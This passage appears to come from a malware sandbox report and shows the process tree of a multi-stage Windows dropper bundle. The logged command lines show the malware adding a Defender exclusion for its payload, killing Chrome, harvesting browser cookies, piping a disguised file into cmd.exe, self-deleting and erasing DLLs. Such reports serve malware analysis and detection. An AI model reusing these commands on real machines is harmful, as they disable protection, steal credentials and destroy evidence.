C:\Users\Admin\AppData\Local\Temp\6c-0deb3-0eb-bb8b6-715c1d9e8c586\ZHifashydexae.exe"C:\Users\Admin\AppData\Local\Temp\6c-0deb3-0eb-bb8b6-715c1d9e8c586\ZHifashydexae.exe"13⤵PID:1224
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vozbtufc.t40\md6_6ydj.exe & exit14⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\vozbtufc.t40\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\vozbtufc.t40\md6_6ydj.exe15⤵PID:7208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0eywq5pd.qld\askinstall31.exe & exit14⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\0eywq5pd.qld\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\0eywq5pd.qld\askinstall31.exe15⤵PID:5424
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe16⤵PID:7724
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe17⤵
- Kills process with taskkill
PID:8512
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exe & exit14⤵PID:8872
-
C:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exe15⤵PID:9088
-
C:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\pa5vg4fp.yvt\toolspab1.exe16⤵PID:8732
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dsaqsfaz.kk3\GcleanerWW.exe /mixone & exit14⤵PID:4732
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vvfdearc.3ld\setup_10.2_mix.exe & exit14⤵PID:10060
-
C:\Users\Admin\AppData\Local\Temp\vvfdearc.3ld\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\vvfdearc.3ld\setup_10.2_mix.exe15⤵PID:10068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mxoxm4g1.ero\file.exe & exit14⤵PID:9792
-
C:\Users\Admin\AppData\Local\Temp\mxoxm4g1.ero\file.exeC:\Users\Admin\AppData\Local\Temp\mxoxm4g1.ero\file.exe15⤵PID:10776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e2r5wihv.x2n\app.exe /8-2222 & exit14⤵PID:8632
-
C:\Users\Admin\AppData\Local\Temp\e2r5wihv.x2n\app.exeC:\Users\Admin\AppData\Local\Temp\e2r5wihv.x2n\app.exe /8-222215⤵PID:3876
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"10⤵PID:4240
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"11⤵PID:2664
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install12⤵PID:8020
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"10⤵PID:7332
-
C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe" 0 306065bb10421b26.04333812 0 10311⤵PID:6188
-
C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe" 1 3.1617513397.60694bb51a001 10312⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LJQ047D2IJ\multitimer.exe" 2 3.1617513397.60694bb51a00113⤵PID:7280
-
C:\Users\Admin\AppData\Local\Temp\ik2cxvx1xzp\vict.exe"C:\Users\Admin\AppData\Local\Temp\ik2cxvx1xzp\vict.exe" /VERYSILENT /id=53514⤵PID:8700
-
C:\Users\Admin\AppData\Local\Temp\is-LN55F.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-LN55F.tmp\vict.tmp" /SL5="$A0316,870426,780800,C:\Users\Admin\AppData\Local\Temp\ik2cxvx1xzp\vict.exe" /VERYSILENT /id=53515⤵PID:8688
-
C:\Users\Admin\AppData\Local\Temp\is-DB94H.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-DB94H.tmp\win1host.exe" 53516⤵PID:5240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\quw04zkoi0c\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\quw04zkoi0c\Setup3310.exe" /Verysilent /subid=57714⤵PID:8312
-
C:\Users\Admin\AppData\Local\Temp\is-O2BRS.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-O2BRS.tmp\Setup3310.tmp" /SL5="$1102E4,138429,56832,C:\Users\Admin\AppData\Local\Temp\quw04zkoi0c\Setup3310.exe" /Verysilent /subid=57715⤵PID:9188
-
C:\Users\Admin\AppData\Local\Temp\is-5JH7K.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5JH7K.tmp\Setup.exe" /Verysilent16⤵PID:8288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2tmfeya34mk\app.exe"C:\Users\Admin\AppData\Local\Temp\2tmfeya34mk\app.exe" /8-2314⤵PID:9032
-
-
C:\Users\Admin\AppData\Local\Temp\vuh5wsgzmdc\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\vuh5wsgzmdc\cpyrix.exe" /VERYSILENT14⤵PID:4444
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe15⤵PID:8664
-
C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run16⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\906ffa80-40e1-400a-92c1-b9415c0d1e9f\AdvancedRun.exe" /SpecialRun 4101d8 604817⤵PID:9480
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force16⤵PID:9776
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 116⤵PID:9220
-
C:\Windows\SysWOW64\timeout.exetimeout 117⤵
- Delays execution with timeout.exe
PID:7232
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"16⤵PID:10268
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"16⤵PID:10484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8664 -s 151616⤵
- Program crash
PID:10628
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe15⤵PID:8128
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"16⤵PID:8876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c3yrl4zjzsq\4lwjtl34oun.exe"C:\Users\Admin\AppData\Local\Temp\c3yrl4zjzsq\4lwjtl34oun.exe" /ustwo INSTALL14⤵PID:8252
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4lwjtl34oun.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\c3yrl4zjzsq\4lwjtl34oun.exe" & exit15⤵PID:8556
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4lwjtl34oun.exe" /f16⤵
- Kills process with taskkill
PID:208
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SJ4VXRRP5F\setups.exe"C:\Users\Admin\AppData\Local\Temp\SJ4VXRRP5F\setups.exe" ll11⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\is-TR5DB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-TR5DB.tmp\setups.tmp" /SL5="$40570,635399,250368,C:\Users\Admin\AppData\Local\Temp\SJ4VXRRP5F\setups.exe" ll12⤵PID:1624
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"10⤵PID:3248
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe11⤵PID:4640
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"10⤵PID:7628
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"10⤵PID:8188
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"11⤵PID:4080
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install12⤵PID:7948
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"10⤵PID:7200
-
C:\Users\Admin\AppData\Local\Temp\is-9G4S1.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-9G4S1.tmp\LabPicV3.tmp" /SL5="$40584,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\is-2HSAK.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-2HSAK.tmp\ppppppfy.exe" /S /UID=lab21412⤵PID:7952
-
C:\Users\Admin\AppData\Local\Temp\24-78dc7-621-4d291-a25ae48ba5173\Pycufymape.exe"C:\Users\Admin\AppData\Local\Temp\24-78dc7-621-4d291-a25ae48ba5173\Pycufymape.exe"13⤵PID:5276
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcsvzjky.4ve\md6_6ydj.exe & exit14⤵PID:3780
-
C:\Users\Admin\AppData\Local\Temp\tcsvzjky.4ve\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\tcsvzjky.4ve\md6_6ydj.exe15⤵PID:8520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xwrmpurk.0ri\askinstall31.exe & exit14⤵PID:8288
-
C:\Users\Admin\AppData\Local\Temp\xwrmpurk.0ri\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\xwrmpurk.0ri\askinstall31.exe15⤵PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exe & exit14⤵PID:8740
-
C:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exe15⤵PID:9008
-
C:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\sretyazh.o3z\toolspab1.exe16⤵PID:5124
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lutwr2j2.qx2\GcleanerWW.exe /mixone & exit14⤵PID:8456
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5j1ialrc.zwy\file.exe & exit14⤵PID:9456
-
C:\Users\Admin\AppData\Local\Temp\5j1ialrc.zwy\file.exeC:\Users\Admin\AppData\Local\Temp\5j1ialrc.zwy\file.exe15⤵PID:3604
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"16⤵PID:4512
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pjlzqbk2.hy4\setup_10.2_mix.exe & exit14⤵PID:10116
-
C:\Users\Admin\AppData\Local\Temp\pjlzqbk2.hy4\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\pjlzqbk2.hy4\setup_10.2_mix.exe15⤵PID:10196
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "16⤵PID:2488
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i2fofvpy.ku4\app.exe /8-2222 & exit14⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\i2fofvpy.ku4\app.exeC:\Users\Admin\AppData\Local\Temp\i2fofvpy.ku4\app.exe /8-222215⤵PID:11256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bvikxodm.pid\Four.exe & exit14⤵PID:7256
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"10⤵PID:4280
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"10⤵PID:6240
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"10⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵PID:5220
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵PID:5068
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qlrmnk14nn2\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\qlrmnk14nn2\cpyrix.exe" /VERYSILENT7⤵PID:7344
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:4040
-
C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run9⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\a8b8c3ee-23ed-4f32-a449-d388b99b1557\AdvancedRun.exe" /SpecialRun 4101d8 436810⤵PID:7420
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force9⤵PID:7004
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 19⤵PID:7252
-
C:\Windows\SysWOW64\timeout.exetimeout 110⤵
- Delays execution with timeout.exe
PID:7968
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"9⤵PID:7432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 14329⤵
- Program crash
PID:4212
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:7880
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"9⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Modifies Control Panel
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5fzyclo0yrq\vict.exe"C:\Users\Admin\AppData\Local\Temp\5fzyclo0yrq\vict.exe" /VERYSILENT /id=5357⤵PID:7228
-
C:\Users\Admin\AppData\Local\Temp\is-2B39D.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-2B39D.tmp\vict.tmp" /SL5="$404E8,870426,780800,C:\Users\Admin\AppData\Local\Temp\5fzyclo0yrq\vict.exe" /VERYSILENT /id=5358⤵PID:7492
-
C:\Users\Admin\AppData\Local\Temp\is-98CLE.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-98CLE.tmp\win1host.exe" 5359⤵PID:6544
-
C:\Users\Admin\AppData\Local\Temp\ifcZ4R15C.exe"C:\Users\Admin\AppData\Local\Temp\ifcZ4R15C.exe"10⤵PID:7436
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"11⤵PID:8092
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif11⤵PID:2512
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe12⤵PID:6508
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 56810⤵
- Program crash
PID:9708
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\crm0l2kkgst\app.exe"C:\Users\Admin\AppData\Local\Temp\crm0l2kkgst\app.exe" /8-237⤵PID:7188
-
-
C:\Users\Admin\AppData\Local\Temp\djeo5mjax33\vpn.exe"C:\Users\Admin\AppData\Local\Temp\djeo5mjax33\vpn.exe" /silent /subid=4827⤵PID:5076
-
-
C:\Users\Admin\AppData\Local\Temp\bttpznqpwir\zyiulaqiret.exe"C:\Users\Admin\AppData\Local\Temp\bttpznqpwir\zyiulaqiret.exe" /ustwo INSTALL7⤵PID:7544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "zyiulaqiret.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bttpznqpwir\zyiulaqiret.exe" & exit8⤵PID:4536
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "zyiulaqiret.exe" /f9⤵
- Kills process with taskkill
PID:6492
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6NHHSARQMM\setups.exe"C:\Users\Admin\AppData\Local\Temp\6NHHSARQMM\setups.exe" ll4⤵PID:4980
-
C:\Users\Admin\AppData\Local\Temp\is-5EQE7.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-5EQE7.tmp\setups.tmp" /SL5="$3051A,635399,250368,C:\Users\Admin\AppData\Local\Temp\6NHHSARQMM\setups.exe" ll5⤵PID:6340
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:6220
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:7016
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:3920
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"3⤵PID:6384
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:1712
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5944
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5416
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5480
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6273EA38FCAB894677F8A950EF6C51F7 C2⤵PID:5568
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B0D88F03B85345A474E9DAD3E57389AB2⤵PID:5140
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6536
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7004
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\is-NSB51.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-NSB51.tmp\vpn.tmp" /SL5="$402D6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\djeo5mjax33\vpn.exe" /silent /subid=4821⤵PID:7352
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5428
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7368
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:5512
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{693aae2f-3ba1-6946-836f-231adf6ec909}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7116
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:6392
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6000
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7216
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\867ef683776f45c19426a213d787c558 /t 3024 /p 30201⤵PID:7736
-
C:\Users\Admin\AppData\Roaming\wfivgvwC:\Users\Admin\AppData\Roaming\wfivgvw1⤵PID:6520
-
C:\Users\Admin\AppData\Roaming\wfivgvwC:\Users\Admin\AppData\Roaming\wfivgvw2⤵PID:348
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\dd5b1d7cf1404f2fb31636c09f17f5d6 /t 3024 /p 30201⤵PID:7208
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6012
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7652
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:6236
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:7316
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\ab81b53a810342b4afd9a6a0443e80f2 /t 0 /p 60121⤵PID:8700
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8276
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6712
-
C:\Users\Admin\AppData\Local\Temp\764B.exeC:\Users\Admin\AppData\Local\Temp\764B.exe1⤵PID:8968
-
C:\Users\Admin\AppData\Local\Temp\83F8.exeC:\Users\Admin\AppData\Local\Temp\83F8.exe1⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\CE22.exeC:\Users\Admin\AppData\Local\Temp\CE22.exe1⤵PID:7424
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CE22.exe"2⤵PID:9240
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:11100
-
-
-
C:\Users\Admin\AppData\Local\Temp\14D0.exeC:\Users\Admin\AppData\Local\Temp\14D0.exe1⤵PID:568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 14D0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\14D0.exe" & del C:\ProgramData\*.dll & exit2⤵PID:9108
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 14D0.exe /f3⤵
- Kills process with taskkill
PID:8004
-
-
-
C:\Users\Admin\AppData\Local\Temp\7551.exeC:\Users\Admin\AppData\Local\Temp\7551.exe1⤵PID:2304
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8596
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8864
-
C:\Users\Admin\AppData\Local\Temp\E65B.exeC:\Users\Admin\AppData\Local\Temp\E65B.exe1⤵PID:8028
-
